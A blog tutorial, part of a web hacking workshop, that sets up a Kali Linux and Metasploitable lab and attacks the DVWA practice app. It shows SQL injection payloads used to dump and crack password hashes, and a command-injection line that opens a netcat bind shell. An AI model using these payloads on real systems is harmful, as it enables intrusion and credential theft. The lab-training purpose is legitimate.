Skip to main content

Web Application Hacking Techniques Part - 4


Hacking into Web Applications

Introduction

    Welcome to the “hacking into web application” module of this workshop. So far, we have been learning a bit of the theoretical part of this module. With a quick walk through of the previous modules, we have covered how web application works, architecture of web applications and what are the different attack vectors usually used to compromise or hack into web applications.

What We Will Cover

   In this module, we will demonstrate the hands-on labs to show how to hack into web applications. We will cover two labs here, which will be enough to give you the flavor and the concepts on how to hack into any server side web application.

  Prerequisites

• Recommended to complete previous three modules
• Basic understanding of TCP/IP
• Web Applications basic knowledge
• Understanding basics of SQL injections
• Basic knowledge of exploitation concepts
• Knowledge of HTML Language and any server side programming language
• Lab Virtual Environment for Demonstration
 
  Virtual Lab Setup

• Downloading & Installing Virtual Box
• Installing Kali Linux as a Virtual Machine
• Downloading Vulnerable Operating System
• Installing the Vulnerable Operating System as Virtual Machine

  Step 1: Downloading & Installing Virtual Box

     Download Link: https://www.virtualbox.org/wiki/Downloads.

     Select & download the binary, as per your operating system requirement. In our case, we will be installing the VirtualBox-4.3.12-93733-OSX from the above download link as shown below.






   Select the installation location or customize the installation as shown above, however, it is recommended to leave the settings as default and hit installation.




   Virtual box installation is now complete. Our next step will be setting up the Kali Linux as a Virtual Machine so that we can use all required tools that are available in Kali Linux as pre-installed.

Step 2: Installing Kali Linux as Virtual Machine

Configuring New Machine

   Our next step is to install Kali Linux Operating System as a Virtual Machine. For this, run the Virtual Box by simply clicking its icon from Applications and you will see it runs quickly as shown below.


Configure Operating System Details

  Now, click the new button on top left corner to setup new machine, type the name and select type of operating system. Later, select the operating system version to install. Configure this as shown in below figure. Once this is complete, you will be prompted to select the memory for this virtual machine.



Configure Memory size

   Configure the memory size, as we will be running the Kali Linux from the Live CD you can easily achieve this by setting up the memory size as 512MB, which can be increased if not enough at run time.



Configure Hard Drive

   Our next step will be configuring the hard drive type and its size. For running Kali Linux from the Live CD, you can easily set the size of hard drive as 10GB Max.




   To save disk space, don’t allocate the 10GB space immediately, select the dynamically allocated option to save your space.



Configure Hard drive other options.

   Configure the size and name of the virtual hard disk you have just configured and create the disk as shown below.



    Now, at this time you should already have the download ISO of Kali Linux with you so that you can configure the ISO option here to boot from CDROM at first boot. To download the Kali Linux ISO version, browse the below link to get your free copy. Depending on your machine type, you can select available ISO images.

   Download Link: http://www.kali.org/downloads/ just to give an idea we have given below the available images snapshot from the above link at the time of this workshop documentation.

   Download any of the ISO files and select the image as shown below to configure your virtual machine. However, it is recommended using the 64-bit version or 32-bit depending on your machine architecture type.

    If you have selected the ISO and no error occurs, you should have this screen showing the following configuration.



  Running Kali as Live Operating System

   We are all set to boot the Kali ISO we have just configured while we set up our virtual machine. Just run the newly created virtual machine and you will see below as the running screen for Kali Linux.


Step 3: Downloading the Vulnerable Operating System

   We have setup the Kali as a Virtual machine, now our next step is to get some vulnerable web applications where we can practice and demonstrate the actual hacking skill in a virtual lab environment. The easiest way to achieve this is to get the Metasploitable ISO from rapid7 so that we can continue to our next section.

What is Metasploitable?

From the vendor’s mouth:

    Metasploitable is a virtual machine based on Linux that contains several intentional vulnerabilities for you to exploit. Metasploitable is essentially a penetration-testing lab in a box, available as a VMware virtual machine (VMX). (The Metasploitable login is “msfadmin”; the password is also “msfadmin”.)

   The Rapid7 Metasploit team creates Metasploitable. By downloading Metasploitable from Rapid7. com, you’ll be sure to get the latest, clean version of the vulnerable machine, plus you’ll get it from our lightning fast download servers.

Download Link

https://information.rapid7.com/metasploitable-download.html

    However, you need to complete a general form so that the community knows you. It’s easy and quick to download this vulnerable operating system. For your comfort, we have given the snapshot of the form (at the time of this workshop development), which is required to be completed appropriately by the user to be able to download this Metasploitable.


    Metasploitable comes in a zip format, which you can unzip to get the files to be used as virtual machine. After unzipping, you should be able to see the following files. As this was running on VMware, you might see a couple more files.



    Now, once done, you should be able to import the Metasploitable into the Virtual Box.

Step 4: Installing Vulnerable Operating System as Virtual Machine

   Open Virtual Box and click on ‘New Virtual machine wizard’. Type the name of your choice. I am using ‘Metasploitable-2’. Choose ‘Type’ as Linux and ‘version’ as Ubuntu. Click on Next.


   Choose the memory size appropriate to the availability of RAM on your host machine although 1512MB is more than enough. Click on Next.



   In the hard drive creation window, select option “Use an existing virtual hard drive”, browse to the folder where we have extracted our zip files and select the ‘vmdk’ file available. Click on Create.

  Or you can simply continue with the “Create a virtual hard drive now” option and later change it to the Metasploitable Hard drive.

   Now select the disk type as Virtual Machine Disk and continue setting up this virtual machine.


    Use the dynamica allocation of hard drive space as we did previously for the Kali Linux and click continue to keep you moving to the next step of virtual machine creation.

    Name the hard drive a convenient name so that you can remember it. This is a useful feature as the hard drive would be saved as a file and the naming convention would make it easier for you to move your file if required.


    Now select the Metasploitable disk image we have from the Metasploitable image just downloaded. Set this as the hard drive and you are all set to boot this Virtual Machine set as Vulnerable Operating System into your Virtual Lab Environment.

   Here you go, now the Vulnerable Operating System is ready to be exploited for your Virtual Lab Environment.


   Default Login is provided earlier in this module and don’t forget to change the password


  Hacking into Web Applications

   We are now all set to hack into the web applications running in this Vulnerable Operating System (Metasploitable). Damn Vulnerable Web Application (DVWA) is developed to teach web application hacking. This web application is intentionally developed with vulnerabilities, like SQL injection, command execution, file upload and other XSS vulnerabilities so that you can practice the skills you have learned in this workshop so far.

Virtual Environment

  As we have installed Kali Linux and Metasploitable to build the virtual hacking environment, let’s run both machines side by side so that we can show you the local internet addresses of the virtual machines.


   Note the Internet Addresses of both the machines. In our lab environment we have the following scheme.

Kali Linux IP: 172.20.10.2

Metasploitable IP: 172.20.10.3

Let’s quickly browse and see what is running on the Metasploitable machine as a web application.


    Okay, we have quite a few applications running on Metasploitable2 as web applications. Let’s pick DVWA that we just mentioned.



Login with default credentials as admin & password.

Using SQL Injection Techniques

  We have explained SQL injections in some detail and have covered much on SQL injections. Let’s use SQL Injections to hack into web applications. At this stage, you should have up and running Metasploitable to continue with our pace of the workshop.

Browse the SQL injection page and you should see the follow screen.


Now, type 2 in the user ID field above and hit submit to see the outcome.


    This is just the information gathering about the application flow and how it works. Now, let’s try to give some bogus info to the User ID field and submit. Before we do that, let us highlight the URL address.

  Web Application Address: http://172.20.10.3/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#.

   Now, the important thing to notice in the URL of this web application is [id=2] means that it takes the input as ID and then runs a search in the database connected at the backend. We will now try to find the SQL injection by providing [‘] as input via URL.

SQL Injection: http://172.20.10.3/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#.

You should see the below screen with the error above SQL injection generates.



With this error, we got to know two important things.

• Application is vulnerable to SQL injections
• Backend database is MYSQL

  Now, let’s inject some SQL injections and find out more sensitive information.

SQL Injection Attack Vector: 1’ union all select system_user(),user()#

  With the above attack vector, we will find out about the web application user level. Type the above attack vector in the user id field and submit. You should get the following information.


   Also, notice the URL above, it shows our SQL injection attack vector. Now, let’s find out some more sensitive information with the following attack vectors as shown below.




   Let’s continue hacking and grab more information to proceed. Let’s grab the entire available databases running on this backend MySQL database.

   Now, we know all the databases names configured on this MySQL server, so let’s start grabbing the table information.

   You will find a big list of tables available. Let’s select user table to grab user information now.

    We have reached the level of columns available in user table, now let’s grab some user information available in this table. Let’s grab that and find out the passwords.


   Hm, we now have the password hashes with us but these are not the real passwords. Not a problem, actually, let’s do some quick cracking of any one of these hashes. We went to the website crackstation.net and tried the third hash value and results are shown below.


Password seems to be charley! Hey charley you have been hacked.

Command Execution Attack Vectors

   We have spoken about the command execution attacks in this module; this is a very dangerous vulnerability. If you can exploit this then you don’t need to go through all the pain of injecting via SQL injections. Let’s quickly check if this application is vulnerable to command execution attacks.

    Login in to DVWA and browse to the command execution page, enter the following command and hit run.

   Command Execution Attack Vector 172.20.10.1| mkfifo /tmp/pipe;sh /tmp/ pipe | nc -l 4444 > /tmp/pipe

   This way we are forcing the web application to execute netcat command and listen on port 4444. Let’s go to msfconsole and execute the command as shown below in the snapshot.



  You can see that we have used multi handler with bind_tcp payload and we have successfully exploited the vulnerability to own this Web Application.


  You can navigate through the session and execution system level commands.
 
   In the next module, we will cover the OWASP top 10 vulnerabilities

Popular posts from this blog

Haking On Demand_WireShark - Part 5

Detect/Analyze Scanning Traffic Using Wireshark “Wireshark”, the world’s most popular Network Protocol Analyzer is a multipurpose tool. It can be used as a Packet Sniffer, Network Analyser, Protocol Analyser & Forensic tool. Through this article my focus is on how to use Wireshark to detect/analyze any scanning & suspect traffic. Let’s start with Scanning first. As a thief studies surroundings before stealing something from a target, similarly attackers or hackers also perform foot printing and scanning before the actual attack. In this phase, they want to collect all possible information about the target so that they can plan their attack accordingly. If we talk about scanning here they want to collect details like: • Which IP addresses are in use? • Which port/services are active on those IPs? • Which platform (Operating System) is in use? • What are the vulnerabilities & other similar kinds of information. • Now moving to some popular scan methods and ho
Read more

Bypassing Web Application Firewall Part - 2

WAF Bypassing with SQL Injection HTTP Parameter Pollution & Encoding Techniques HTTP Parameter Pollution is an attack where we have the ability to override or add HTTP GET/POST parameters by injecting string delimiters. HPP can be distinguished in two categories, client-side and server-side, and the exploitation of HPP can result in the following outcomes:  •Override existing hardcoded HTTP parameters  •Modify the application behaviors   •Access and potentially exploit uncontrollable variables  • Bypass input validation checkpoints and WAF rules HTTP Parameter Pollution – HPP   WAFs, which is the topic of interest, many times perform query string parsing before applying the filters to this string. This may result in the execution of a payload that an HTTP request can carry. Some WAFs analyze only one parameter from the string of the request, most of the times the first or the last, which may result in a bypass of the WAF filters, and execution of the payload in the server.  Let’s e
Read more

Bypassing Web Application Firewall Part - 4

Securing WAF and Conclusion DOM Based XSS DOM based XSS is another type of XSS that is also used widely, and we didn’t discuss it in module 3. The DOM, or Document Object Model, is the structural format used to represent documents in a browser. The DOM enables dynamic scripts such as JavaScript to reference components of the document such as a form field or a session cookie, and it is also a security feature that limits scripts on different domains from obtaining cookies for other domains. Now, the XSS attacks based on this is when the payload that we inject is executed as a result of modifying the DOM environment in the victim’s browser, so that the code runs in an unexpected way. By this we mean that in contrast with the other two attacks, here the page that the victim sees does not change, but the injected code is executed differently because of the modifications that have been done in the DOM environment, that we said earlier. In the other XSS attacks, we saw the injected code was
Read more